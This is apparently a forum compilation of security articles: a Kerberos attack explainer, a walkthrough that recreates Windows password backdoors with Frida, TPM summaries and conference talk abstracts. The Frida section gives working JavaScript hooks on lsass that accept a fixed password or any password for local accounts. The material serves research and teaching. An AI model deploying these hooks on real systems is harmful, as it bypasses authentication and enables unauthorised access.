There are several structures handled by Kerberos, such as tickets. Many of those structures are encrypted or signed in order to prevent tampering by third parties. These keys are the following:

KDC or krbtgt key, which is derived from the krbtgt account NTLM hash.
User key, which is derived from the user NTLM hash.
Service key, which is derived from the NTLM hash of the service owner, which can be a user or computer account.
Session key, which is negotiated between the user and the KDC.
Service session key, to be used between the user and the service.

Tickets

The main structures handled by Kerberos are the tickets. These tickets are delivered to users so they can perform several actions in the Kerberos realm. There are 2 types:

The TGS (Ticket Granting Service) is the ticket which a user can use to authenticate against a service. It is encrypted with the service key.
The TGT (Ticket Granting Ticket) is the ticket presented to the KDC to request TGSs. It is encrypted with the KDC key.

PAC

The PAC (Privilege Attribute Certificate) is a structure included in almost every ticket. This structure contains the privileges of the user and is signed with the KDC key. It is possible for services to verify the PAC by communicating with the KDC, although this does not happen often. Nevertheless, PAC verification consists of checking only its signature, without inspecting whether the privileges inside the PAC are correct. Furthermore, a client can avoid the inclusion of the PAC inside the ticket by specifying it in the KERB-PA-PAC-REQUEST field of the ticket request.

Messages

Kerberos uses different kinds of messages. The most interesting are the following:

KRB_AS_REQ: Used to request the TGT from the KDC.
KRB_AS_REP: Used by the KDC to deliver the TGT.
KRB_TGS_REQ: Used to request the TGS from the KDC, using the TGT.
KRB_TGS_REP: Used by the KDC to deliver the TGS.
KRB_AP_REQ: Used to authenticate a user against a service, using the TGS.
KRB_AP_REP: (Optional) Used by the service to identify itself to the user.
KRB_ERROR: Message to communicate error conditions.

Additionally, even though it is not part of Kerberos but of NRPC, the AP could optionally use the KERB_VERIFY_PAC_REQUEST message to send the PAC signature to the KDC and verify whether it is correct. Below is a summary of the message sequence used to perform authentication: [Figure: Kerberos messages summary]

Authentication process

In this section, the sequence of messages used to perform authentication will be studied, starting from a user without tickets, up to being authenticated against the desired service.

KRB_AS_REQ

Firstly, the user must get a TGT from the KDC. To achieve this, a KRB_AS_REQ must be sent: [Figure: KRB_AS_REQ message schema]

KRB_AS_REQ has, among others, the following fields:

A timestamp encrypted with the client key, to authenticate the user and prevent replay attacks
Username of the authenticated user
The service SPN associated with the krbtgt account
A nonce generated by the user

Note: the encrypted timestamp is only necessary if the user requires preauthentication, which is common, unless the DONT_REQ_PREAUTH flag is set in the user account.

KRB_AS_REP

After receiving the request, the KDC verifies the user's identity by decrypting the timestamp. If the message is correct, it must respond with a KRB_AS_REP: [Figure: KRB_AS_REP message schema]

KRB_AS_REP includes the following information:

Username
TGT, which includes:
- Username
- Session key
- Expiration date of TGT
- PAC with user privileges, signed by the KDC
Data encrypted with the user key, which includes:
- Session key
- Expiration date of TGT
- User nonce, to prevent replay attacks

Once finished, the user already has the TGT, which can be used to request TGSs and afterwards access the services.
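The AS exchange above can be modelled in a few lines of Python to make the role of the encrypted timestamp concrete. This is a toy model, not real Kerberos: a SHA-256-keystream XOR stands in for the actual encryption types (RC4-HMAC, AES) and key derivation, just to show that pre-authentication proves knowledge of the user key without ever sending the password:

```python
import hashlib
import os
import time

def derive_key(password: str) -> bytes:
    # Stand-in for the real key derivation (NTLM hash / AES keys).
    return hashlib.sha256(password.encode()).digest()

def xor_crypt(key: bytes, data: bytes) -> bytes:
    # Toy symmetric cipher: XOR against a SHA-256-derived keystream.
    # XOR is its own inverse, so this both encrypts and decrypts.
    stream = b""
    block = 0
    while len(stream) < len(data):
        stream += hashlib.sha256(key + block.to_bytes(4, "big")).digest()
        block += 1
    return bytes(a ^ b for a, b in zip(data, stream))

# KRB_AS_REQ: the client proves knowledge of its key by sending an
# encrypted timestamp (pre-authentication), never the password itself.
user_key = derive_key("S3cretP4ss")
enc_timestamp = xor_crypt(user_key, str(int(time.time())).encode())

# KDC side: derive the same key from the stored credential and check
# that the timestamp decrypts to something recent (replay protection).
decrypted = xor_crypt(derive_key("S3cretP4ss"), enc_timestamp)
assert abs(int(decrypted) - int(time.time())) < 300

# KRB_AS_REP: the KDC delivers a fresh session key encrypted under the
# user key (alongside the TGT, which is encrypted under the krbtgt key).
session_key = os.urandom(16)
enc_part = xor_crypt(user_key, session_key)
assert xor_crypt(user_key, enc_part) == session_key
print("AS exchange modelled: session key delivered")
```

This also illustrates why ASREPRoast (described later) works: if the KDC skips the timestamp check, anyone can obtain the encrypted reply and brute-force candidate passwords against it offline.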
KRB_TGS_REQ

In order to request a TGS, a KRB_TGS_REQ message must be sent to the KDC: [Figure: KRB_TGS_REQ message schema]

KRB_TGS_REQ includes:

Data encrypted with the session key:
- Username
- Timestamp
TGT
SPN of the requested service
Nonce generated by the user

KRB_TGS_REP

After receiving the KRB_TGS_REQ message, the KDC returns a TGS inside a KRB_TGS_REP: [Figure: KRB_TGS_REP message schema]

KRB_TGS_REP includes:

Username
TGS, which contains:
- Service session key
- Username
- Expiration date of TGS
- PAC with user privileges, signed by the KDC
Data encrypted with the session key:
- Service session key
- Expiration date of TGS
- User nonce, to prevent replay attacks

KRB_AP_REQ

To finish, if everything went well, the user already has a valid TGS to interact with the service. In order to use it, the user must send the AP a KRB_AP_REQ message: [Figure: KRB_AP_REQ message schema]

KRB_AP_REQ includes:

TGS
Data encrypted with the service session key:
- Username
- Timestamp, to avoid replay attacks

After that, if the user's privileges are right, the user can access the service. In that case, which does not usually happen, the AP will verify the PAC against the KDC. Also, if mutual authentication is needed, it will respond to the user with a KRB_AP_REP message.

Attacks

Based on the previously explained authentication process, this section explains the attacks aimed at compromising Active Directory.

Overpass The Hash/Pass The Key (PTK)

The popular Pass The Hash (PTH) attack consists of using the user hash to impersonate that user. In the context of Kerberos this is known as Overpass The Hash or Pass The Key. If an attacker gets the hash of any user, he can impersonate him against the KDC and then gain access to several services. User hashes can be extracted from SAM files on workstations or the NTDS.DIT file of DCs, as well as from lsass process memory (by using Mimikatz), where it is also possible to find cleartext passwords.

Pass The Ticket (PTT)

The Pass The Ticket technique is about getting a user's ticket and using it to impersonate that user.
However, besides the ticket, it is also necessary to obtain the session key in order to use the ticket. It is possible to obtain the ticket by performing a Man-In-The-Middle attack, due to the fact that Kerberos is sent over TCP or UDP. However, this technique does not give access to the session key. An alternative is getting the ticket from lsass process memory, where the session key also resides. This procedure can be performed with Mimikatz. It is better to obtain a TGT, since a TGS can only be used against one service. Also, it should be taken into account that the lifetime of tickets is 10 hours; after that they are unusable.

Golden Ticket and Silver Ticket

The objective of the Golden Ticket is to build a TGT. For this, it is necessary to obtain the NTLM hash of the krbtgt account. Once that is obtained, a TGT with a custom user and privileges can be built. Moreover, even if the user changes his password, the ticket will still be valid. The TGT can only be invalidated if it expires or the krbtgt account changes its password. The Silver Ticket is similar; however, this time the built ticket is a TGS. In this case the service key is required, which is derived from the service owner account. Nevertheless, it is not possible to sign the PAC correctly without the krbtgt key. Therefore, if the service verifies the PAC, this technique will not work.

Kerberoasting

Kerberoasting is a technique which takes advantage of TGSs to crack user account passwords offline. As seen above, the TGS comes encrypted with the service key, which is derived from the service owner account's NTLM hash. Usually the owners of services are the computers on which the services are executed. However, computer passwords are very complex; thus, it is not useful to try to crack those. The same applies to the krbtgt account; therefore, the TGT is not crackable either. All the same, on some occasions the owner of a service is a normal user account. In these cases it is more feasible to crack their passwords.
Moreover, this sort of accounts normally have very juicy privileges. Additionally, to get a TGS for any service only a normal domain account is needed, due to Kerberos not perform authorization checks. ASREPRoast ASREPRoast is similar to Kerberoasting, that also pursues the accounts passwords cracking. If the attribute DONT_REQ_PREAUTH is set in a user account, then it is possible to built a KRB_AS_REQ message without specifying its password. After that, the KDC will respond with a KRB_AS_REP message, which will contain some information encrypted with the user key. Thus, this message can be used to crack the user password. Conclusion In this first post the Kerberos authentication process has been studied and the attacks has been also introduced. The following posts will show how to perform these attacks in a practical way and also how delegation works. I really hope that this post it helps to understand some of the more abstract concepts of Kerberos. References Kerberos v5 RFC: https://tools.ietf.org/html/rfc4120 [MS-KILE] – Kerberos extension: https://msdn.microsoft.com/en-us/library/cc233855.aspx [MS-APDS] – Authentication Protocol Domain Support: https://msdn.microsoft.com/en-us/library/cc223948.aspx Mimikatz and Active Directory Kerberos Attacks: https://adsecurity.org/?p=556 Explain like I’m 5: Kerberos: https://www.roguelynn.com/words/explain-like-im-5-kerberos/ Kerberos & KRBTGT: https://adsecurity.org/?p=483 Mastering Windows Network Forensics and Investigation, 2 Edition . Autores: S. Anson , S. Bunting, R. Johnson y S. Pearson. Editorial Sibex. Active Directory , 5 Edition. Autores: B. Desmond, J. Richards, R. Allen y A.G. 
Lowe-Norris.
Service Principal Names: https://msdn.microsoft.com/en-us/library/ms677949(v=vs.85).aspx
Active Directory functional levels: https://technet.microsoft.com/en-us/library/dbf0cdec-d72f-4ba3-bc7a-46410e02abb0
OverPass The Hash – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/overpass-the-hash
Pass The Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
Golden Ticket – Gentilkiwi Blog: https://blog.gentilkiwi.com/securite/mimikatz/golden-ticket-kerberos
Mimikatz Golden Ticket Walkthrough: https://www.beneaththewaves.net/Projects/Mimikatz_20_-_Golden_Ticket_Walkthrough.html
Attacking Kerberos: Kicking the Guard Dog of Hades: https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf
Kerberoasting – Part 1: https://room362.com/post/2016/kerberoast-pt1/
Kerberoasting – Part 2: https://room362.com/post/2016/kerberoast-pt2/
Roasting AS-REPs: https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/
PAC Validation: https://passing-the-hash.blogspot.com.es/2014/09/pac-validation-20-minute-rule-and.html
Understanding PAC Validation: https://blogs.msdn.microsoft.com/openspecification/2009/04/24/understanding-microsoft-kerberos-pac-validation/
Reset the krbtgt account password/keys: https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51
Mitigating Pass-the-Hash (PtH) Attacks and Other Credential Theft: https://www.microsoft.com/en-us/download/details.aspx?id=36036
Fun with LDAP, Kerberos (and MSRPC) in AD Environments: https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments?slide=58

Sursa: https://www.tarlogic.com/en/blog/how-kerberos-works/
-
recreating known universal windows password backdoors with Frida Reading time ~20 min Posted by leon on 23 April 2019 Categories: Backdoor, Frida, Lsass, Windows, Password

tl;dr I have been actively using Frida for a little over a year now, but primarily on mobile devices while building the objection toolkit. My interest in using it on other platforms has been growing, and I decided to play with it on Windows to get a feel. I needed an objective, and decided to try to port a well-known local Windows password backdoor to Frida. This post is mostly about the process of how Frida will let you quickly investigate and prototype using dynamic instrumentation.

the setup

Before I could do anything, I had to install and configure Frida. I used the standard Python-based Frida environment as this includes tooling for really easy, rapid development. I just had to install a Python distribution on Windows, followed by a pip install frida frida-tools. With Frida configured, the next question was what to target? Given that anything passwords related is usually interesting, I decided on the Windows Local Security Authority Subsystem Service (lsass.exe). I knew there was a lot of existing knowledge that could be referenced for lsass, especially when considering projects such as Mimikatz, but decided to venture down the path of discovery alone. I figured I’d start by attaching Frida to lsass.exe and enumerating the process a little. Currently loaded modules and any module exports were of interest to me. I started by simply typing frida lsass.exe to attach to the process from an elevated command prompt (Run as Administrator -> accept UAC prompt), and failed pretty hard: RtlCreateUserThread returned 0xc0000022 Running Frida from a PowerShell prompt worked fine though: Frida attached to lsass.exe Turns out, SeDebugPrivilege was not granted by default for the command prompt in my Windows 10 installation, but was when invoking PowerShell.
SeDebugPrivilege disabled in an Administrator command prompt With that out of the way, let's write some scripts to enumerate lsass! I started simple, with only a Process.enumerateModules() call, iterating the results and printing the module name. This would tell me which modules were currently loaded in lsass. lsass module enumeration Some Googling of the loaded DLLs, as well as exports enumeration, had me focus on the msv1_0.dll Authentication Package first. This authentication package was described as the one responsible for local machine logons, and a prime candidate for our shenanigans. Frida has a utility called frida-trace (part of the frida-tools package) which can be used to trace function calls within a DLL. So, I went ahead and traced msv1_0.dll while performing a local interactive login using runas. msv1_0.dll exports, viewed in IDA Free frida-trace output for msv1_0.dll when performing two local, interactive authentication actions As you can see, frida-trace makes it suuuuuper simple to get a quick idea of what may be happening under the hood, showing a flow of LsaApCallPackageUntrusted() -> MsvSamValidate(), followed by two LsaApLogonTerminated() calls when I invoke runas /user:user cmd. Without studying the function prototype for MsvSamValidate(), I decided to take a look at what the return values would be for the function (if any) with a simple log(retval) statement in the onLeave() function. This function was part of the autogenerated handlers that frida-trace creates for any matched methods it should trace, dumping a small JavaScript snippet in the __handlers__ directory. MsvSamValidate return values A naive assumption at this stage was that if the supplied credentials were incorrect, MsvSamValidate() would simply return a non-NULL value (which may be an error code or something).
The hook does not consider what the method is actually doing (or that there may be further function calls that may be more interesting), especially in the case of valid authentication, but I figured I’d give overriding the return value a shot, even when an invalid set of credentials was supplied. Editing the handler generated by frida-trace, I added a retval.replace(0x0) statement to the onLeave() method, and tried to auth… One dead Windows Computer Turns out, LSASS is not that forgiving when you tamper with its internals. I had no expectation that this was going to work, but it proved an interesting exercise nonetheless. From here, I had to resort to actually understanding MsvSamValidate() before I could get anything useful done with it.

backdoor – approach #1

Playing with MsvSamValidate() did not yield much in terms of an interesting hook, but researching LSASS and Authentication Packages online led me to this article which described a “universal” password backdoor for any local Windows account. I figured this may be an interesting one to look at, and so a new script began that focussed on RtlCompareMemory. According to the article, RtlCompareMemory would be called to finally compare the MD4 value from a local SAM database with a calculated MD4 of a provided password. The blog post also included some sample code to demonstrate the backdoor, which implements a hardcoded password to trigger a successful authentication scenario. From the MSDN docs, RtlCompareMemory takes three arguments, where the first two are pointers and the third is a count of the number of bytes to compare. The function simply returns a value indicating how many bytes from the two blocks of memory were the same. In the case of an MD4 comparison, if 16 bytes are the same, then the two blocks will be considered equal, and the RtlCompareMemory function will return 0x10.
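The documented contract can be modeled in a few lines of Python to make the 0x10 logic concrete (a sketch of the behavior described on MSDN, not the real routine):

```python
# A tiny Python model of RtlCompareMemory's contract: it returns how many
# leading bytes of the two blocks match, so comparing two equal 16-byte
# MD4 hashes yields 16 (0x10).
def rtl_compare_memory(source1: bytes, source2: bytes, length: int) -> int:
    matched = 0
    for a, b in zip(source1[:length], source2[:length]):
        if a != b:
            break
        matched += 1
    return matched

stored_hash   = bytes.fromhex('8846f7eaee8fb117ad06bdd830b7586c')  # MD4 of 'password'
supplied_hash = bytes.fromhex('8846f7eaee8fb117ad06bdd830b7586c')
wrong_hash    = bytes.fromhex('00112233445566778899aabbccddeeff')

print(rtl_compare_memory(stored_hash, supplied_hash, 16))  # 16 (0x10): full match
print(rtl_compare_memory(stored_hash, wrong_hash, 16))     # 0: first bytes already differ
```

This is exactly the property the backdoor abuses later: whatever actually happened inside the comparison, a forced return value of 0x10 looks like a full 16-byte match to the caller.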
To understand how RtlCompareMemory was used from an LSASS perspective, I decided to use frida-trace to visualise invocations of the function. This was a really cheap attempt considering that I knew this specific function was interesting. I did not have to find out which DLLs may have this function or anything; frida-trace does all of that for us after simply specifying the target function name. Unfiltered RtlCompareMemory invocations from within lsass.exe The RtlCompareMemory function was resolved in both Kernel32.dll as well as in ntdll.dll. I focused on ntdll.dll, but it turns out it could work with either. Upon invocation, without even attempting to authenticate to anything, the output was racing past in the terminal, making it impossible to follow (as you can see by the “ms” readings in the above screenshot). I needed to get the output filtered, showing only the relevant invocations. The first question I had was: “Are these calls from kernel32 or ntdll?”, so I added a module string to the autogenerated frida-trace handler to distinguish the two. Module information added to log() calls Running the modified handlers, I noticed that the RtlCompareMemory function in both modules was being called, every time. Interesting. Next, I decided to log the lengths that were being compared. Maybe there is a difference? Remember, RtlCompareMemory receives a third argument for the length, so we could just dump that value from memory. RtlCompareMemory size argument dumping So even the size was the same for the RtlCompareMemory calls in both of the identified modules. At this stage, I decided to focus on the function in ntdll.dll, and ignore the kernel32.dll module for now. I also dumped the bytes of what was being compared to screen so that I could get some indication of the data involved. Frida has a hexdump helper specifically for this!
RtlCompareMemory block contents I observed the output for a while to see if I could spot any patterns, especially while performing authentication. The password for the user account I configured was… password, and eventually, I spotted it as one of the blocks RtlCompareMemory had to compare. ASCII, NULL padded password spotted as one of the memory blocks used in RtlCompareMemory I also noticed that many different block sizes were being compared using RtlCompareMemory. As the local Windows SAM database stores the password for an account as an MD4 hash, these hashes can be represented as 16 bytes in memory. As RtlCompareMemory gets the length of bytes to compare, I decided to just filter the output to only report where 16 bytes were to be compared. This is also how the code in the previously mentioned blogpost filters candidates to check for the backdoor password. This time round, the output generated by frida-trace was much more readable and I could get a better idea of what was going on. An analysis of the output yielded the following results: When providing either the correct or an incorrect password to the runas command, the RtlCompareMemory function is called five times. The first eight characters from the password entered appear to be padded with a 0x00 byte between each character, most likely due to unicode encoding, making up a 16 byte stream that gets compared with something else (unknown value). The fourth call to RtlCompareMemory appears to compare against the hash from the SAM database, which is provided as arg[0]. The password for the test account was password, which has an MD4 hash value of 8846f7eaee8fb117ad06bdd830b7586c. Five calls to RtlCompareMemory (incl. memory block contents) that wanted to compare 16 bytes when providing an invalid password of testing123 Five calls to RtlCompareMemory (incl.
memory block contents) that wanted to compare 16 bytes when providing a valid password of password At this point I figured I should log the function return values as well, just to get an idea of what a success and failure condition looks like. I made two more authentication attempts using runas, one with a valid password and one with an invalid password, observing what the RtlCompareMemory function returns. RtlCompareMemory return values The fourth call to RtlCompareMemory returns the number of bytes that matched in the successful case (which was actually the MD4 comparison), which should be 16 (indicated by the hex 0x10). Considering what we have learnt so far, I naively assumed I could make a “universal backdoor” by simply returning 0x10 for any call to RtlCompareMemory that wanted to compare 16 bytes, originating from within LSASS. This would mean that any password would work, right? I updated the frida-trace handler to simply retval.replace(0x10), indicating that 16 bytes matched, in the onLeave method and tested! Authentication failure after aggressively overriding the return value for RtlCompareMemory Instead of successfully authenticating, the number of times RtlCompareMemory got called was reduced to only two invocations (usually it would be five), and the authentication attempt completely failed, even when the correct password was provided. I wasn’t as lucky as I had hoped. I figured this may be because of the overrides, and I may be breaking other internals where a return from RtlCompareMemory may be used in a negative test. For plan B, I decided to simply recreate the backdoor of the original blogpost. That means, when authenticating with a specific password, only then return that check as successful (in other words, return 0x10 from the RtlCompareMemory function). We learnt in previous tests that the fourth invocation of RtlCompareMemory compares the two buffers of the calculated MD4 of the supplied password and the MD4 from the local SAM database.
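As a side note, the NULL byte observed between password characters in the earlier hexdumps is simply UTF-16LE encoding, which is also the encoding Windows applies before MD4-hashing a password into its NT hash. This is easy to confirm in Python (any interpreter, no Windows needed):

```python
# The 0x00 "padding" between password characters seen in the hexdumps is just
# UTF-16LE: every ASCII character becomes two bytes, the second being NULL.
encoded = 'password'.encode('utf-16le')
print(encoded.hex())  # 700061007300730077006f0072006400
print(len(encoded))   # 16 bytes for an 8-character password
```

This also explains why an 8-character password happens to fill exactly 16 bytes, the same size as an MD4 hash, and why the one-liner below encodes the password as utf-16le before hashing.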
So, for the backdoor to trigger, we should embed the MD4 of a password we know, and trigger when that is supplied. I used a small python2 one-liner to generate an MD4 of the word backdoor, formatted as an array you can use in JavaScript: import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()]) When run in a python2 interpreter, the one-liner should output something like [22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]. This is a byte array that can be used in a Frida script to check whether the supplied password was backdoor, and if so, return 0x10 from the RtlCompareMemory function. This should also prevent the case where blindly returning 0x10 for any 16 byte comparison using RtlCompareMemory breaks other stuff. Up until now we have been using frida-trace and its autogenerated handlers to interact with the RtlCompareMemory function. While this was perfect for us to quickly interact with the target function, a more robust way is preferable in the long term. Ideally, we want to make the sharing of a simple JavaScript snippet easy. To replicate the functionality we have been using up until now, we can use the Frida Interceptor API, providing the address of ntdll!RtlCompareMemory and performing our logic in there as we have in the past using the autogenerated handler. We can find the address of our function using the Module API, calling getExportByName on it.
// from: https://github.com/sensepost/frida-windows-playground/blob/master/RtlCompareMemory_backdoor.js
const RtlCompareMemory = Module.getExportByName('ntdll.dll', 'RtlCompareMemory');

// generate bytearrays with python:
// import hashlib;print([ord(x) for x in hashlib.new('md4', 'backdoor'.encode('utf-16le')).digest()])
// const newPassword = new Uint8Array([136, 70, 247, 234, 238, 143, 177, 23, 173, 6, 189, 216, 48, 183, 88, 108]); // password
const newPassword = new Uint8Array([22, 115, 28, 159, 35, 140, 92, 43, 79, 18, 148, 179, 250, 135, 82, 84]); // backdoor

Interceptor.attach(RtlCompareMemory, {
    onEnter: function (args) {
        this.compare = 0;
        if (args[2] == 0x10) {
            const attempt = new Uint8Array(ptr(args[1]).readByteArray(16));
            this.compare = 1;
            this.original = attempt;
        }
    },
    onLeave: function (retval) {
        if (this.compare == 1) {
            var match = true;
            for (var i = 0; i != this.original.byteLength; i++) {
                if (this.original[i] != newPassword[i]) {
                    match = false;
                }
            }
            if (match) {
                retval.replace(16);
            }
        }
    }
});

The resultant script means that one can authenticate using any local account with the password backdoor when invoking Frida with frida lsass.exe -l .\backdoor.js from an Administrative PowerShell prompt.

backdoor – approach #2

Our backdoor approach has a few limitations; the first being that network logons (such as ones initiated using smbclient) don’t appear to work with the backdoor password, the second being that I wanted any password to work, not just backdoor (or whatever you embed in the script). Using the script we have already written, I decided to take a closer look and try to figure out what was calling RtlCompareMemory. I love backtraces, and generating those with Frida is really simple using the backtrace() method on the Thread module. With a backtrace we should be able to see exactly where a call to RtlCompareMemory came from and extend our investigation a little further.
Backtraces printed for each invocation of RtlCompareMemory I investigated the five backtraces and found two function names that were immediately interesting: the first being MsvpValidateTarget and the second being MsvpPasswordValidate. MsvpValidateTarget was being called right after MsvpSamValidate, which may explain why my initial hooking attempts failed, as there may be more processing happening there. MsvpPasswordValidate was being called in the fourth invocation of RtlCompareMemory, which was the call that compared two MD4 hashes when authenticating interactively, as previously discussed. At this stage I Googled the MsvpPasswordValidate function, only to find out that this method is well known for password backdoors! In fact, it’s the same method used by Inception for authentication bypasses. Awesome, I may be on the right track after all. I couldn’t quickly find a function prototype for MsvpPasswordValidate online, but a quick look in IDA Free hinted towards the fact that MsvpPasswordValidate may expect seven arguments. I figured now would be a good time to hook those, and log the return value. MsvpPasswordValidate argument and return value dump Using runas /user:user cmd from a command prompt and providing the correct password for the account, MsvpPasswordValidate would return 0x1, whereas providing an incorrect password would return 0x0. Seems easy enough? I modified the existing hook to simply change the return value of MsvpPasswordValidate to always be 0x1. Doing this, I was able to authenticate using any password for any valid user account, even when using network authentication!
Successful authentication, with any password for a valid user account

// from: https://github.com/sensepost/frida-windows-playground/blob/master/MsvpPasswordValidate_backdoor.js
const MsvpPasswordValidate = Module.getExportByName(null, 'MsvpPasswordValidate');
console.log('MsvpPasswordValidate @ ' + MsvpPasswordValidate);

Interceptor.attach(MsvpPasswordValidate, {
    onLeave: function (retval) {
        retval.replace(0x1);
    }
});

creating standalone Frida executables

The hooks we have built so far depend heavily on the Frida Python modules. This is not something you would necessarily have available on an arbitrary Windows target, making the practicality of using this rather complicated. We could use something like py2exe, but that comes with its own set of bloat and things to avoid. Instead, we could build a standalone executable in C that bypasses the need for a Python runtime entirely. The main Frida source repository contains some example code for those that want to make use of the lower level bindings here. When choosing to go down this path, you will need to decide between two types of C bindings; the one that includes the V8 JavaScript engine (frida-core/frida-gumjs), and one that does not (frida-gum). When using frida-gum, instrumentation needs to be implemented using a C API, skipping the JavaScript engine layer entirely. This has obvious wins when it comes to overall binary size, but increases the implementation complexity a little bit. Using frida-core, we could simply reuse the JavaScript hook we have already written, embedding it in an executable. But, we will be packaging the V8 engine with our executable, which is not great from a size perspective. A complete example of using frida-core is available here, and that is what I used as a template. The only thing I changed was how a target process ID was determined.
The original code accepted a process ID as an argument, but I changed that to determine it using frida_device_get_process_by_name_sync, providing lsass.exe as the name of the process I was interested in. The definition for this function lives in frida-core.h, which you can get as part of the frida-core devkit download. Next, I embedded the MsvpPasswordValidate bypass hook and compiled the project using Visual Studio Community 2017. The result? A beefy 44MB executable that would now work regardless of the status of a Python installation. Maybe py2exe wasn’t such a bad idea after all… Passback binary, in all of its 44mb glory, injected into LSASS.exe to allow for local authentication using any password Some work could be done to optimise the overall size of the resultant executable, but this would involve rebuilding the frida-core devkit from source and stripping the pieces we won’t need. An exercise left for the reader, or for me, for another day. If you are interested in building this yourself, have a look at the source code repository for passback here, opening it in Visual Studio 2017 and hitting “build”.

summary

If you got here, you saw how it was possible to recreate two well-known password backdoors on Windows-based computers using Frida. The real-world merits of where this may be useful may be small, but I believe the journey getting there is what was important. A Github repository with all of the code samples used in this post is available here. Sursa: https://sensepost.com/blog/2019/recreating-known-universal-windows-password-backdoors-with-frida/
-
Windows Insight: The TPM

The Windows Insight repository currently hosts three articles on the TPM (Trusted Platform Module):

The TPM: Communication Interfaces (Aleksandar Milenkoski) In this work, we discuss how the different components of the Windows 10 operating system, deployed in user-land and in kernel-land, use the TPM. We focus on the communication interfaces between Windows 10 and the TPM. In addition, we discuss the construction of TPM usage profiles, that is, information on system entities communicating with the TPM as well as on communication patterns and frequencies;

The TPM: Integrity Measurement (Aleksandar Milenkoski) In this work, we discuss the integrity measurement mechanism of Windows 10 and the role that the TPM plays as part of it. This mechanism, among other things, implements the production of measurement data. This involves calculation of hashes of relevant executable files or of code sequences at every system startup. It also involves the storage of these hashes and relevant related data in log files for later analysis;

The TPM: Workflow of the Manual and Automatic TPM Provisioning Processes (Aleksandar Milenkoski) In this work, we describe the implementation of the TPM provisioning process in Windows 10. We first define the term TPM provisioning in order to set the scope of this work. Under TPM provisioning, we understand activities storing data in the TPM device, where the stored data is a requirement for the device to be used. This includes: authorization values, the Endorsement Key (EK), and the Storage Root Key (SRK).

– Aleksandar Milenkoski

Sursa: https://insinuator.net/2019/05/windows-insight-the-tpm/
-
In this talk we will explore how file formats can be abused to target the security of an end user or server, without harming a CPU register or the memory layout, with a focus on the OpenDocument file format. At first a short introduction to file format bug hunting will be given, based on my own approach. This will cover my latest Adobe PDF Reader finding and will lead up to my discovery of a remote code execution in LibreOffice. It shows how a simple path traversal issue allowed me to abuse the macro feature to execute a python script installed by LibreOffice, and abuse it to execute any local program with parameters, without any prompt. Additionally, other scripting languages supported in LibreOffice will be explored, as well as other interesting features and differences to OpenOffice. As software like ImageMagick uses LibreOffice for file conversion, potential security issues on the server side will be explained as well. This focuses on certain problems and limitations an attacker has to work with regarding the macro support, and other threats like polyglot files or local file path information. Lastly, the potential threats will be summed up to raise awareness regarding any support for file formats and what precautions should be taken.

About Alex Inführ

As a Senior Penetration Tester with Cure53, Alex is an expert on browser security and PDF security. His cardinal skillset relates to spotting and abusing ways for uncommon script execution in MSIE, Firefox and Chrome. Alex’s additional research foci revolve around SVG security and Adobe products used in the web context. He has worked with Cure53 for multiple years with a focus on web security, JavaScript sandboxes and file format issues. He presented his research at conferences like Appsec Amsterdam, Appsec Belfast, ItSecX and multiple OWASP chapters.
As part of his research as a co-author of the 'Cure53 Browser Security White Paper', sponsored by Google, he investigated the security of browser extensions.

About Security Fest 2019

May 23rd - 24th 2019. This summer, Gothenburg will become the most secure city in Sweden! We'll have two days filled with great talks by internationally renowned speakers on some of the most cutting-edge and interesting topics in IT-security! Our attendees will learn from the best and the brightest, and have a chance to get to know each other during the lunch, dinner, after-party and scheduled breaks. Please note that you have to be at least 18 years old to attend.

Highlights of Security Fest
Interesting IT-security talks by renowned speakers
Lunch and dinner included
Great CTF with nice prizes
Awesome party!

Venue
Security Fest is held in Eriksbergshallen in Gothenburg, with an industrial decor from the time it was used as a mechanical workshop. Right next to the venue, you can stay at Quality Hotel 11.
-
Danger of using fully homomorphic encryption - Zhiniang Peng
Evolving Attacker Techniques in Cryptocurrency User Targeting - Philip Martin
(SAP) Gateway to Heaven - Dmitry Chastuhin & Mathieu Geli
Practical Uses for Memory Visualization - Ulf Frisk
Modern Secure Boot Attacks - Alex Matrosov
Trade War Shellcode Wielding of Imports and Exports - Willi Ballenthin
Using Symbolic Execution to Root Routers - Mathy Vanhoef
Automated Reverse Engineering of Industrial Control Systems Binaries - Mihalis Maniatakos
Lions at the watering hole - Andrei Boz
WhatsApp Digger - Deemah, Lamyaa, Malak, Sarah
Next-gen IoT botnets - Alex "Jay" Balan

Sursa: